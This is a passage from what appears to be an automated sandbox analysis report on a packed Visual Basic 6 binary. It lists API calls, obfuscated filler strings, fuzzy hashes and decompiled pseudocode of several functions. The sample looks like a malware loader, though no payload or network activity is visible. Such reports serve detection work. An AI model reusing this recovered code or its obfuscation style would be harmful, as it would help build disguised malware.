__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041E81C
__vbaStrCopy.MSVBVM60 ref: 0041E82C
__vbaStrVarMove.MSVBVM60(?,00006FEE,?,?), ref: 0041E85B
__vbaStrMove.MSVBVM60(?,00006FEE,?,?), ref: 0041E865
__vbaFreeStrList.MSVBVM60(00000002,00000000,?), ref: 0041E8A1
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041E8B3
__vbaFreeVar.MSVBVM60 ref: 0041E8C1
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041E8E0
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E919
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,000000F8), ref: 0041E966
__vbaStrCopy.MSVBVM60(00000000,?,00403CC4,000000F8), ref: 0041E990
__vbaStrCopy.MSVBVM60(00000000,?,00403CC4,000000F8), ref: 0041E99D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004038E8,00000704), ref: 0041E9F0
__vbaFreeStrList.MSVBVM60(00000002,00000000,?), ref: 0041EA0E
__vbaFreeObj.MSVBVM60 ref: 0041EA19
__vbaHresultCheckObj.MSVBVM60(00000000,?,004038E8,00000708), ref: 0041EA5C
__vbaFreeVar.MSVBVM60(00000000,?,004038E8,00000708), ref: 0041EA76
__vbaFreeStr.MSVBVM60(0041EB3D), ref: 0041EAF1
__vbaFreeStr.MSVBVM60(0041EB3D), ref: 0041EAF9
__vbaFreeStr.MSVBVM60(0041EB3D), ref: 0041EB01
__vbaFreeStr.MSVBVM60(0041EB3D), ref: 0041EB09
__vbaAryDestruct.MSVBVM60(00000000,?,0041EB3D), ref: 0041EB14
__vbaAryDestruct.MSVBVM60(00000000,?,00000000,?,0041EB3D), ref: 0041EB1F
__vbaFreeStr.MSVBVM60(00000000,?,00000000,?,0041EB3D), ref: 0041EB27
__vbaFreeVar.MSVBVM60(00000000,?,00000000,?,0041EB3D), ref: 0041EB2F
__vbaFreeStr.MSVBVM60(00000000,?,00000000,?,0041EB3D), ref: 0041EB37

Strings

INDUSTRIALIZING, xrefs: 0041E824
Koaguleringerne7, xrefs: 0041DEED
T, xrefs: 0041D8F9
STYRETABELLER, xrefs: 0041D08F
Bakteriers, xrefs: 0041DA31
Zombie3, xrefs: 0041E988
Unecliptic9, xrefs: 0041CCEB
Hvepsetaljer, xrefs: 0041E3A1
Apparat5, xrefs: 0041E995
Tvivlsomst9, xrefs: 0041D171
Calelectricity, xrefs: 0041D087
Bovlamme1, xrefs: 0041CCE6
phrontisterium, xrefs: 0041CFC2
Tosdede8, xrefs: 0041CF44
2, xrefs: 0041DEDF
stivstikkere, xrefs: 0041CCFC

Memory Dump Source

Source File: 00000001.00000002.870203334.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.870198729.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.870226387.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.870232976.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$List$Move$CopyError$CallLateSystem$Ansi$Destruct$#517#618#692#711#712#717ChkstkPrintVar2
String ID: 2$Apparat5$Bakteriers$Bovlamme1$Calelectricity$Hvepsetaljer$INDUSTRIALIZING$Koaguleringerne7$STYRETABELLER$Tosdede8$Tvivlsomst9$Unecliptic9$Zombie3$phrontisterium$stivstikkere$T
API String ID: 2704859531-1304991006
Opcode ID: 10d9a0389c705f733a8ba4d68cb256d8bc014ccbf9ed16445f11cf7e5fd7c797
Instruction ID: 30f3d19e1653cabe8b938ee1ee80cd4c520afbefca585874095d9777b0b7e508
Opcode Fuzzy Hash: 10d9a0389c705f733a8ba4d68cb256d8bc014ccbf9ed16445f11cf7e5fd7c797
Instruction Fuzzy Hash: 6F03F671940229AFDB20DF60CC45FDDB7B9BB08304F1044EAE50ABB2A1DB795A85DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041EF8D, Relevance: 68.6, APIs: 35, Strings: 4, Instructions: 358
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041EF8D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				short* _v36;
				char _v48;
				void* _v56;
				char _v60;
				void* _v64;
				char _v68;
				intOrPtr* _v72;
				signed int _v76;
				intOrPtr* _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				intOrPtr* _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				char* _t170;
				signed int _t174;
				char* _t179;
				signed int _t183;
				char* _t188;
				signed int _t192;
				signed int _t193;
				char* _t198;
				signed int _t202;
				signed int _t203;
				signed int _t205;
				char* _t210;
				signed int _t214;
				signed int _t215;
				char* _t220;
				signed int _t224;
				signed int _t225;
				char* _t230;
				signed int _t234;
				char* _t237;
				intOrPtr _t286;

				_push(0x401356);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t286;
				_push(0x74);
				L00401350();
				_v12 = _t286;
				_v8 = 0x401260;
				L004014E2();
				_push(2);
				_push(0x403e8c);
				_push( &_v48);
				L004014B8();
				_push(L"Eksperimenternes");
				_push(L"Finansierings");
				_push(L"Confabulatory");
				_push(L"ministerstormens"); // executed
				L004014B2(); // executed
				if( *0x422010 != 0) {
					_v84 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v84 = 0x422010;
				}
				_t170 =  &_v60;
				L00401566();
				_v72 = _t170;
				_t174 =  *((intOrPtr*)( *_v72 + 0x1f0))(_v72,  &_v64, _t170,  *((intOrPtr*)( *((intOrPtr*)( *_v84)) + 0x2fc))( *_v84));
				asm("fclex");
				_v76 = _t174;
				if(_v76 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x1f0);
					_push(0x403c58);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v88 = _t174;
				}
				 *_v36 = _v64;
				L0040156C();
				if( *0x422010 != 0) {
					_v92 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v92 = 0x422010;
				}
				_t179 =  &_v60;
				L00401566();
				_v72 = _t179;
				_t183 =  *((intOrPtr*)( *_v72 + 0x98))(_v72,  &_v64, _t179,  *((intOrPtr*)( *((intOrPtr*)( *_v92)) + 0x30c))( *_v92));
				asm("fclex");
				_v76 = _t183;
				if(_v76 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x98);
					_push(0x403cc4);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v96 = _t183;
				}
				 *((short*)(_v36 + 2)) = _v64;
				L0040156C();
				if( *0x422010 != 0) {
					_v100 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v100 = 0x422010;
				}
				_t188 =  &_v60;
				L00401566();
				_v72 = _t188;
				_t192 =  *((intOrPtr*)( *_v72 + 0x178))(_v72,  &_v64, _t188,  *((intOrPtr*)( *((intOrPtr*)( *_v100)) + 0x308))( *_v100));
				asm("fclex");
				_v76 = _t192;
				if(_v76 >= 0) {
					_v104 = _v104 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x403cc4);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v104 = _t192;
				}
				_t193 = 2;
				 *((short*)(_v36 + (_t193 << 1))) = _v64;
				L0040156C();
				if( *0x422010 != 0) {
					_v108 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v108 = 0x422010;
				}
				_t198 =  &_v60;
				L00401566();
				_v72 = _t198;
				_t202 =  *((intOrPtr*)( *_v72 + 0x98))(_v72,  &_v64, _t198,  *((intOrPtr*)( *((intOrPtr*)( *_v108)) + 0x30c))( *_v108));
				asm("fclex");
				_v76 = _t202;
				if(_v76 >= 0) {
					_v112 = _v112 & 0x00000000;
				} else {
					_push(0x98);
					_push(0x403cc4);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v112 = _t202;
				}
				_t203 = 2;
				 *((short*)(_v36 + _t203 * 3)) = _v64;
				L0040156C();
				_t205 = 2;
				 *((short*)(_v36 + (_t205 << 2))) = 0x1b7c;
				if( *0x422010 != 0) {
					_v116 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v116 = 0x422010;
				}
				_t210 =  &_v60;
				L00401566();
				_v72 = _t210;
				_t214 =  *((intOrPtr*)( *_v72 + 0x168))(_v72,  &_v64, _t210,  *((intOrPtr*)( *((intOrPtr*)( *_v116)) + 0x2fc))( *_v116));
				asm("fclex");
				_v76 = _t214;
				if(_v76 >= 0) {
					_v120 = _v120 & 0x00000000;
				} else {
					_push(0x168);
					_push(0x403c58);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v120 = _t214;
				}
				_t215 = 2;
				 *((short*)(_v36 + _t215 * 5)) = _v64;
				L0040156C();
				if( *0x422010 != 0) {
					_v124 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v124 = 0x422010;
				}
				_t220 =  &_v60;
				L00401566();
				_v72 = _t220;
				_t224 =  *((intOrPtr*)( *_v72 + 0xf8))(_v72,  &_v64, _t220,  *((intOrPtr*)( *((intOrPtr*)( *_v124)) + 0x308))( *_v124));
				asm("fclex");
				_v76 = _t224;
				if(_v76 >= 0) {
					_v128 = _v128 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x403cc4);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v128 = _t224;
				}
				_t225 = 2;
				 *((short*)(_v36 + _t225 * 6)) = _v64;
				L0040156C();
				L004014AC();
				if( *0x422010 != 0) {
					_v132 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v132 = 0x422010;
				}
				_t230 =  &_v60;
				L00401566();
				_v72 = _t230;
				_t234 =  *((intOrPtr*)( *_v72 + 0x168))(_v72,  &_v64, _t230,  *((intOrPtr*)( *((intOrPtr*)( *_v132)) + 0x2fc))( *_v132));
				asm("fclex");
				_v76 = _t234;
				if(_v76 >= 0) {
					_v136 = _v136 & 0x00000000;
				} else {
					_push(0x168);
					_push(0x403c58);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v136 = _t234;
				}
				_v24 = _v64;
				L0040156C();
				_push(0x41f45f);
				_v68 =  &_v48;
				_t237 =  &_v68;
				_push(_t237);
				_push(0);
				L004014D6();
				L00401554();
				return _t237;
			}

0x0041ef92
0x0041ef9d
0x0041ef9e
0x0041efa5
0x0041efa8
0x0041efb0
0x0041efb3
0x0041efc0
0x0041efc5
0x0041efc7
0x0041efcf
0x0041efd0
0x0041efd5
0x0041efda
0x0041efdf
0x0041efe4
0x0041efe9
0x0041eff5
0x0041f00f
0x0041eff7
0x0041eff7
0x0041effc
0x0041f001
0x0041f006
0x0041f006
0x0041f02a
0x0041f02e
0x0041f033
0x0041f042
0x0041f048
0x0041f04a
0x0041f051
0x0041f06d
0x0041f053
0x0041f053
0x0041f058
0x0041f05d
0x0041f060
0x0041f063
0x0041f068
0x0041f068
0x0041f078
0x0041f07e
0x0041f08a
0x0041f0a4
0x0041f08c
0x0041f08c
0x0041f091
0x0041f096
0x0041f09b
0x0041f09b
0x0041f0bf
0x0041f0c3
0x0041f0c8
0x0041f0d7
0x0041f0dd
0x0041f0df
0x0041f0e6
0x0041f102
0x0041f0e8
0x0041f0e8
0x0041f0ed
0x0041f0f2
0x0041f0f5
0x0041f0f8
0x0041f0fd
0x0041f0fd
0x0041f10d
0x0041f114
0x0041f120
0x0041f13a
0x0041f122
0x0041f122
0x0041f127
0x0041f12c
0x0041f131
0x0041f131
0x0041f155
0x0041f159
0x0041f15e
0x0041f16d
0x0041f173
0x0041f175
0x0041f17c
0x0041f198
0x0041f17e
0x0041f17e
0x0041f183
0x0041f188
0x0041f18b
0x0041f18e
0x0041f193
0x0041f193
0x0041f19e
0x0041f1a8
0x0041f1af
0x0041f1bb
0x0041f1d5
0x0041f1bd
0x0041f1bd
0x0041f1c2
0x0041f1c7
0x0041f1cc
0x0041f1cc
0x0041f1f0
0x0041f1f4
0x0041f1f9
0x0041f208
0x0041f20e
0x0041f210
0x0041f217
0x0041f233
0x0041f219
0x0041f219
0x0041f21e
0x0041f223
0x0041f226
0x0041f229
0x0041f22e
0x0041f22e
0x0041f239
0x0041f244
0x0041f24b
0x0041f252
0x0041f259
0x0041f266
0x0041f280
0x0041f268
0x0041f268
0x0041f26d
0x0041f272
0x0041f277
0x0041f277
0x0041f29b
0x0041f29f
0x0041f2a4
0x0041f2b3
0x0041f2b9
0x0041f2bb
0x0041f2c2
0x0041f2de
0x0041f2c4
0x0041f2c4
0x0041f2c9
0x0041f2ce
0x0041f2d1
0x0041f2d4
0x0041f2d9
0x0041f2d9
0x0041f2e4
0x0041f2ef
0x0041f2f6
0x0041f302
0x0041f31c
0x0041f304
0x0041f304
0x0041f309
0x0041f30e
0x0041f313
0x0041f313
0x0041f337
0x0041f33b
0x0041f340
0x0041f34f
0x0041f355
0x0041f357
0x0041f35e
0x0041f37a
0x0041f360
0x0041f360
0x0041f365
0x0041f36a
0x0041f36d
0x0041f370
0x0041f375
0x0041f375
0x0041f380
0x0041f38b
0x0041f392
0x0041f397
0x0041f3a3
0x0041f3bd
0x0041f3a5
0x0041f3a5
0x0041f3aa
0x0041f3af
0x0041f3b4
0x0041f3b4
0x0041f3d8
0x0041f3dc
0x0041f3e1
0x0041f3f0
0x0041f3f6
0x0041f3f8
0x0041f3ff
0x0041f41e
0x0041f401
0x0041f401
0x0041f406
0x0041f40b
0x0041f40e
0x0041f411
0x0041f416
0x0041f416
0x0041f429
0x0041f430
0x0041f435
0x0041f448
0x0041f44b
0x0041f44e
0x0041f44f
0x0041f451
0x0041f459
0x0041f45e

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041EFA8
__vbaStrCopy.MSVBVM60(?,?,?,?,00401356), ref: 0041EFC0
__vbaAryConstruct2.MSVBVM60(?,00403E8C,00000002,?,?,?,?,00401356), ref: 0041EFD0
#690.MSVBVM60(ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403E8C,00000002,?,?,?,?,00401356), ref: 0041EFE9
__vbaNew2.MSVBVM60(0040324C,00422010,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403E8C,00000002,?,?,?,?,00401356), ref: 0041F001
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403E8C,00000002), ref: 0041F02E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,000001F0,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403E8C), ref: 0041F063
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403E8C,00000002), ref: 0041F07E
__vbaNew2.MSVBVM60(0040324C,00422010,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403E8C,00000002), ref: 0041F096
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403E8C), ref: 0041F0C3
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000098,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes), ref: 0041F0F8
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403E8C,00000002), ref: 0041F114
__vbaNew2.MSVBVM60(0040324C,00422010,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403E8C), ref: 0041F12C
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes), ref: 0041F159
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000178,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory), ref: 0041F18E
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403E8C), ref: 0041F1AF
__vbaNew2.MSVBVM60(0040324C,00422010,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes), ref: 0041F1C7
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory), ref: 0041F1F4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000098), ref: 0041F229
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes), ref: 0041F24B
__vbaNew2.MSVBVM60(0040324C,00422010,?,?,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory), ref: 0041F272
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F29F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,00000168), ref: 0041F2D4
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory), ref: 0041F2F6
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041F30E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F33B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,000000F8), ref: 0041F370
__vbaFreeObj.MSVBVM60(00000000,?,00403CC4,000000F8), ref: 0041F392
#598.MSVBVM60(00000000,?,00403CC4,000000F8), ref: 0041F397
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041F3AF
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F3DC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,00000168), ref: 0041F411
__vbaFreeObj.MSVBVM60(00000000,?,00403C58,00000168), ref: 0041F430
__vbaAryDestruct.MSVBVM60(00000000,?,0041F45F), ref: 0041F451
__vbaFreeStr.MSVBVM60(00000000,?,0041F45F), ref: 0041F459

Strings

Confabulatory, xrefs: 0041EFDF
Eksperimenternes, xrefs: 0041EFD5
ministerstormens, xrefs: 0041EFE4
Finansierings, xrefs: 0041EFDA

Memory Dump Source

Source File: 00000001.00000002.870203334.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.870198729.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.870226387.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.870232976.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultNew2$#598#690ChkstkConstruct2CopyDestruct
String ID: Confabulatory$Eksperimenternes$Finansierings$ministerstormens
API String ID: 2817960149-3291121498
Opcode ID: 4f34558d0ce1b7e1016418814f3bf45b9529cd97d45b16dc066e7c36ba90e25a
Instruction ID: ab86d41bf8f7aabff84135fdf40ee56bca9a1fc09df18f8c6a529c01208823d0
Opcode Fuzzy Hash: 4f34558d0ce1b7e1016418814f3bf45b9529cd97d45b16dc066e7c36ba90e25a
Instruction Fuzzy Hash: 28E10974E40208EFCB10DFA0D945FDDBBB5BF08705F20406AE502BB2A1DB796986DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00420DCD, Relevance: 15.1, APIs: 10, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00420DCD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				char _v72;
				signed int _v76;
				signed int _v84;
				signed int _v88;
				signed int _t50;
				signed int _t62;
				void* _t67;
				void* _t74;
				intOrPtr _t76;

				_t67 = __edx;
				 *[fs:0x0] = _t76;
				L00401350();
				_v12 = _t76;
				_v8 = 0x401330;
				L004013FE();
				_t50 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v72,  &_v24, _a4, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x401356, __ecx, __ecx, _t74);
				asm("fclex");
				_v76 = _t50;
				if(_v76 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x4038b8);
					_push(_a4);
					_push(_v76);
					L00401572();
					_v84 = _t50;
				}
				_v32 = _v72;
				L004013FE();
				L004013F8();
				_v28 = E0042110C( &_v36);
				L0040156C();
				_v32 = E0042110C(_v28) + 0x2b0;
				E00421205(_t67, _v32, _a8);
				_v60 = 0x80020004;
				_v68 = 0xa;
				_v44 = 0x80020004;
				_v52 = 0xa;
				L00401350();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401350();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t62 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10,  &_v36,  &_v36, _a4);
				asm("fclex");
				_v76 = _t62;
				if(_v76 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x2b0);
					_push(0x4038b8);
					_push(_a4);
					_push(_v76);
					L00401572();
					_v88 = _t62;
				}
				_push(0x420f10);
				L0040156C();
				return _t62;
			}

0x00420dcd
0x00420dde
0x00420de8
0x00420df0
0x00420df3
0x00420e01
0x00420e12
0x00420e15
0x00420e17
0x00420e1e
0x00420e37
0x00420e20
0x00420e20
0x00420e22
0x00420e27
0x00420e2a
0x00420e2d
0x00420e32
0x00420e32
0x00420e3e
0x00420e48
0x00420e51
0x00420e5c
0x00420e62
0x00420e74
0x00420e7d
0x00420e82
0x00420e89
0x00420e90
0x00420e97
0x00420ea1
0x00420eab
0x00420eac
0x00420ead
0x00420eae
0x00420eb2
0x00420ebc
0x00420ebd
0x00420ebe
0x00420ebf
0x00420ec8
0x00420ece
0x00420ed0
0x00420ed7
0x00420ef3
0x00420ed9
0x00420ed9
0x00420ede
0x00420ee3
0x00420ee6
0x00420ee9
0x00420eee
0x00420eee
0x00420ef7
0x00420f0a
0x00420f0f

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 00420DE8
__vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401356), ref: 00420E01
__vbaHresultCheckObj.MSVBVM60(00000000,?,004038B8,00000058), ref: 00420E2D
__vbaObjSetAddref.MSVBVM60(?,?), ref: 00420E48
#644.MSVBVM60(?,?,?), ref: 00420E51
__vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 00420E62
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 00420EA1
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 00420EB2
__vbaHresultCheckObj.MSVBVM60(00000000,?,004038B8,000002B0), ref: 00420EE9
__vbaFreeObj.MSVBVM60(00420F10), ref: 00420F0A

Memory Dump Source

Source File: 00000001.00000002.870203334.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.870198729.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.870226387.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.870232976.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
String ID:
API String ID: 1032928638-0
Opcode ID: f07a4270cae6bc8084da2a04930fcf9c494daee70f1d64fcee7c20777eda3e3c
Instruction ID: 5c5ee5ea1fd4be4873ee9baac328192464a572d23d35aabb663a8adb81f2e21b
Opcode Fuzzy Hash: f07a4270cae6bc8084da2a04930fcf9c494daee70f1d64fcee7c20777eda3e3c
Instruction Fuzzy Hash: AC413771900218EFDF01EFA1D846BEEBBB5FF04744F10442AF901BB1A1C7B99A859B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041EB5C, Relevance: 13.6, APIs: 9, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0041EB5C(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v28;
				intOrPtr _v36;
				char _v44;
				char _v64;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr* _v80;
				signed int _v84;
				char* _t34;
				signed int _t38;
				char* _t40;
				intOrPtr _t55;

				_push(0x401356);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t55;
				_push(0x40);
				L00401350();
				_v12 = _t55;
				_v8 = 0x401238;
				if( *0x422010 != 0) {
					_v80 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v80 = 0x422010;
				}
				_t34 =  &_v28;
				L00401566();
				_v68 = _t34;
				_t38 =  *((intOrPtr*)( *_v68 + 0x58))(_v68,  &_v64, _t34,  *((intOrPtr*)( *((intOrPtr*)( *_v80)) + 0x2fc))( *_v80));
				asm("fclex");
				_v72 = _t38;
				if(_v72 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x403c58);
					_push(_v68);
					_push(_v72);
					L00401572();
					_v84 = _t38;
				}
				_v36 = _v64;
				_v44 = 3;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_t40 =  &_v44;
				_push(_t40); // executed
				L004014D0(); // executed
				L00401560();
				L0040156C();
				L0040157E();
				_push(0x41ec5f);
				L00401554();
				return _t40;
			}

0x0041eb61
0x0041eb6c
0x0041eb6d
0x0041eb74
0x0041eb77
0x0041eb7f
0x0041eb82
0x0041eb90
0x0041ebaa
0x0041eb92
0x0041eb92
0x0041eb97
0x0041eb9c
0x0041eba1
0x0041eba1
0x0041ebc5
0x0041ebc9
0x0041ebce
0x0041ebdd
0x0041ebe0
0x0041ebe2
0x0041ebe9
0x0041ec02
0x0041ebeb
0x0041ebeb
0x0041ebed
0x0041ebf2
0x0041ebf5
0x0041ebf8
0x0041ebfd
0x0041ebfd
0x0041ec09
0x0041ec0c
0x0041ec13
0x0041ec15
0x0041ec17
0x0041ec19
0x0041ec1b
0x0041ec1e
0x0041ec1f
0x0041ec29
0x0041ec31
0x0041ec39
0x0041ec3e
0x0041ec59
0x0041ec5e

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041EB77
__vbaNew2.MSVBVM60(0040324C,00422010,?,?,?,?,00401356), ref: 0041EB9C
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041EBC9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,00000058), ref: 0041EBF8
#704.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041EC1F
__vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041EC29
__vbaFreeObj.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041EC31
__vbaFreeVar.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041EC39
__vbaFreeStr.MSVBVM60(0041EC5F,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041EC59

Memory Dump Source

Source File: 00000001.00000002.870203334.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.870198729.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.870226387.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.870232976.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#704CheckChkstkHresultMoveNew2
String ID:
API String ID: 2174863854-0
Opcode ID: 031be3bf5c6e110ca8e63b9db8b51c0cb0440af0af7ff91b395f9255a6d70169
Instruction ID: 96fcbc07dff98381eec08e90b4062ee9d082e63e9d634214f6aa2a8c058409da
Opcode Fuzzy Hash: 031be3bf5c6e110ca8e63b9db8b51c0cb0440af0af7ff91b395f9255a6d70169
Instruction Fuzzy Hash: BB312774900218BFCB14EF95CD46FDDBBB9AB44714F20022AF512BB2E0DBB86945CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00420F23, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00420F23(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				char _v72;
				char _v88;
				intOrPtr _v96;
				intOrPtr _v104;
				char* _t33;
				void* _t36;
				void* _t46;
				void* _t48;
				intOrPtr _t49;

				_t49 = _t48 - 0xc;
				 *[fs:0x0] = _t49;
				L00401350();
				_v16 = _t49;
				_v12 = 0x401340;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x58,  *[fs:0x0], 0x401356, _t46);
				 *_a8 =  *_a8 & 0x00000000;
				E00421022();
				_v96 = 2;
				_v104 = 2;
				L004013F2();
				_v96 = 0x808aca;
				_v104 = 3;
				L004013F2();
				_t33 =  &_v88;
				L004013EC();
				L00401506();
				_t36 =  *((intOrPtr*)( *_a4 + 0x72c))(_a4, _t33, _t33, _t33,  &_v40,  &_v72);
				_push(0x420ff9);
				L0040157E();
				L0040157E();
				return _t36;
			}

0x00420f26
0x00420f35
0x00420f3f
0x00420f47
0x00420f4a
0x00420f51
0x00420f60
0x00420f66
0x00420f69
0x00420f6e
0x00420f75
0x00420f82
0x00420f87
0x00420f8e
0x00420f9b
0x00420fa8
0x00420fac
0x00420fb2
0x00420fc0
0x00420fc6
